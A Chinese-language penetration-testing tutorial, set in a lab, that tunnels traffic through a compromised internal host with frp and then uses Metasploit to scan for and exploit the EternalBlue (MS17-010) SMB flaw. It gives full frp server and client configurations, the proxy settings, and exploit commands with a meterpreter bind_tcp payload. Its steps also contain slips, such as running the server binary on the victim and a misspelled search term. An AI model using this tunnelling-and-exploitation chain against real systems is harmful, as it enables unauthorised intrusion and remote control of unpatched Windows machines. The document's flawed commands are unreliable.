
内网渗透-利用frp代理流量后msf攻击内网永恒之蓝漏洞(ms17-010)-永恒之蓝利用失败的原因
0x01 前言当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。初级–》frp代理了解进阶–》多层代理0x02 靶场环境靶场搭建0x03 frp简易配置frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序,下载地址https://g
0x01 前言
当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。
初级–》frp代理了解
进阶–》多层代理
0x02 靶场环境
0x03 frp简易配置
frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序,
下载地址
https://github.com/fatedier/frp/releases/tag/v0.38.0
一、frps.ini 配置
1、很多时候,我们都是用腾讯云,或者阿里云进行搭建frp 的服务端,所以这时候,我们需要开启开启对应配置端口防火墙通过,我一般是全部开启的,但我这个环境是用kali进行搭建,所以这步,进行略过,下面我们上代码
[common]
bind_addr = 0.0.0.0 # 设置监听的ip ,一般是你的外网ip,0.0.0.0表示都监听
bind_port = 8000 # 监听的端口,等待客户端连接
dashboard_addr = 0.0.0.0 # frp网站服务器的ip,可以访问登录
dashboard_port = 7600 # frp网站服务器的端口,可以访问登录
dashboard_user = root # frp网站服务账号
dashboard_pwd = 123456 # frp网站服务密码
token = 1q2w3e # 客户端的连接密码
heartbeat_timeout = 90 # 连接超时的时间
max_pool_count = 5 # 允许连接的客户端数量
2、然后在vps 上执行
sudo ./frps -c ./frps.ini
这时候可能会报错,这是以为有些linux 是不支持 # 号符注释的, 要把上面的# 注释去掉。
3、然后访问vps ip 加7600端口,可以看到我们搭建的frp网站情况。
二、frpc.ini 配置
1、当我们拿到一台主机的shell,我们就要上次对应的frpc 文件进行流量代理,
frpc.ini配置
[common]
tls_enable = true
server_addr = *.*.*.* # vps 服务器地址
server_port = 8000 # vps服务器监听地址
token = 1q2w3e # 设置的密码 ,设置完流量加密,不好解。
pool_count = 5 # 将提前建立连接,默认值为 0
protocol = tcp # 通信方式
health_check_type = tcp # frpc 将连接本地服务的端口以检测其健康状态
health_check_interval_s = 100 # 健康检查时间间隔
[proxies]
remote_port = 6000 # 把流量转发到vps 那个端口 ,这个是重点等下会用到
plugin = socks5 #plugin 表示为插件
use_encryption = true
use_compression = true
2、然后在受害者主机上执行
sudo ./frps -c ./frps.ini
出现 success 说明连接成功
0x04 msf设置
一、代理配置
1、首先启动msf
msfconsole
2、设置代理msf的代理为127.0.0.1的6000端口,这个是刚才remote_port 会用到的端口
setg Proxies socks5:127.0.0.1:6000
3、允许反向连接
set ReverseAllowProxy true
二、ms17-010攻击
1、扫描ms17-010 漏洞
search msf17-010
use auxiliary/scanner/smb/smb_ms17_010 # 选择扫描模块
show options # 查看模块配置
set rhost 10.0.1.7 # 选择攻击ip
run
下图,表面存在该漏洞。
2、利用pyload 进行攻击
search msf17-010
use exploit/windows/smb/ms17_010_eternalblue # 结果测试,这个工具链的成功率会比较大
show options #查看配置
set payload windows/x64/meterpreter/bind_tcp
# 设置正向连接,因为目标在内网,所以需要设置成正向连接目标主机才能执行成功。
set rhost 10.0.1.7
run
msf拿shell后进入交互模式,发现乱码
输入chcp 65001
0x05 总结
之所以用msf 进行永恒之蓝漏洞,是因为用其他脚本的利用失败率很高,所以现在大部分还是选择msf进行利用。
更多推荐